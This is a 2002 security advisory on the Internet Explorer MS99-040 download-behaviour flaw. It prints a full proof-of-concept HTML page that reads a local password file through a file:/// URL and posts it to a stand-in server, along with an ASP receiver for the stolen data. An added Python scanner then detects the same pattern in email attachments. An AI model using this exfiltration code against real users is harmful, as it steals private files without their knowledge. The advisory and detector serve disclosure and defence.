** Digit-Labs Security Advisory (http://www.digit-labs.org/) **
Advisory Name: MS99-040 Exploit
Release Date: 18.3.2002
Application: Tested on IE5.0 & IE 6
Platform: Tested on Windows NT/XP
Severity: Medium
Author(s): GoLLuM.no [mailto:[email protected]]
Vendor Status: Known since way back in September 28, 1999 (MS99-040)
Executive Summary:
Microsoft posted a security bulletin on this way back on September 28,
1999. It is still exploitable, though, if the HTML file is run from the
user's local disk and not from a web server or file share.
Microsoft does not tell you how it actually works, but
since I am a nice person I will share it with you people... :-)
Detailed Description:
Internet Explorer 5 and onwards implement several 'Behaviours'. One of
these is the so-called "Download Behaviour", which downloads a file and
notifies a specified callback function when the download is complete.
It does, however, have a security glitch that allows files to be
downloaded directly from the client's computer without his/her
knowledge; these files could very well be password files or any other
files that the client has access to. After the file is downloaded it
can be posted to a server without the user's knowledge. The danger is
in someone mailing you an attached HTML page that you open, which then
steals some files from you. Before the V5 patch this exploit would work
from a web server too.
Proof-of-concept:
1. Create a file on your hard disk called c:\passwords.pwd
2. Place the text "ginger:eqweqw234qwe213:Ginger Lynn:::" in the new
file
3. Create a new HTML file somewhere on your PC (not on a web server or
file share) and call it download.htm
4. Place the following content in the HTML file you just created:
<HTML XMLNS:IE>
<IE:DOWNLOAD ID="oDownload" STYLE="behavior:url(#default#download)" />
<SCRIPT LANGUAGE="vbscript">
' Callback invoked by the download behaviour with the file contents in s
Function onDownloadDone(s)
document.all.obj.value="a" & s
document.all.myform.submit()
End Function
</SCRIPT>
<body onload="vbscript:oDownload.startDownload 'file:///c:/passwords.pwd', GetRef('onDownloadDone')">
<form id="myform" action="http://www.yourserver.C0M/test.asp" method="post">
<input type="hidden" value="oldval" id="obj" name="obj">
</form>
</body>
</HTML>
5. Create a file on a web server to receive the stolen file, called
test.asp, and put the following in it if using ASP:
<html>
<head></head>
<body>
Stolen password file:
<br>
<%
response.write request.form("obj")
%>
</body>
</html>
6. Run the HTML file to test the exploit.
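Added example (not part of the original advisory): a mail-gateway style check that flags an HTML attachment showing the three ingredients of the pattern above, the #default#download behaviour, a file:/// reference, and a form that posts off-host. The sample attachment below is a constructed copy of the proof-of-concept shape; the scanner and its function names are assumptions of this example.

```python
import re
from html.parser import HTMLParser

# Constructed sample in the shape of the proof-of-concept above.
POC_HTML = """<HTML XMLNS:IE>
<IE:DOWNLOAD ID="oDownload" STYLE="behavior:url(#default#download)" />
<SCRIPT LANGUAGE="vbscript">
Function onDownloadDone(s)
document.all.obj.value="a" & s
document.all.myform.submit()
End Function
</SCRIPT>
<body onload="vbscript:oDownload.startDownload 'file:///c:/passwords.pwd', GetRef('onDownloadDone')">
<form id="myform" action="http://www.yourserver.C0M/test.asp" method="post">
<input type="hidden" value="oldval" id="obj" name="obj">
</form></body></HTML>"""

# Constructed benign control: an ordinary page with a remote link only.
BENIGN_HTML = '<html><body><a href="http://example.test/x">link</a></body></html>'

FILE_URL = re.compile(r"file:///[^'\"\s]+", re.I)

class BehaviorScanner(HTMLParser):
    """Collects the ingredients of the MS99-040 local-file read pattern."""
    def __init__(self):
        super().__init__()
        self.download_behavior = False   # element styled with #default#download
        self.local_file_refs = []        # file:/// URLs in attributes or script text
        self.remote_post_targets = []    # form actions pointing at a remote host
    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if "#default#download" in a.get("style", "").lower():
            self.download_behavior = True
        for v in a.values():
            self.local_file_refs += FILE_URL.findall(v)
        if tag.lower() == "form" and a.get("action", "").lower().startswith(("http://", "https://")):
            self.remote_post_targets.append(a["action"])
    def handle_data(self, data):          # script bodies arrive here as raw text
        self.local_file_refs += FILE_URL.findall(data)

def scan_attachment(html):
    """Return a list of findings; a non-empty list means quarantine the attachment."""
    p = BehaviorScanner()
    p.feed(html)
    findings = []
    if p.download_behavior:
        findings.append("download behavior")
    if p.local_file_refs:
        findings.append("local file reference: " + ", ".join(p.local_file_refs))
    if p.download_behavior and p.remote_post_targets:
        findings.append("exfil form to: " + ", ".join(p.remote_post_targets))
    return findings
```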
See also:
http://www.microsoft.com/technet/treeview/default.asp?url=/TechNet/security/bulletin/ms99-040.asp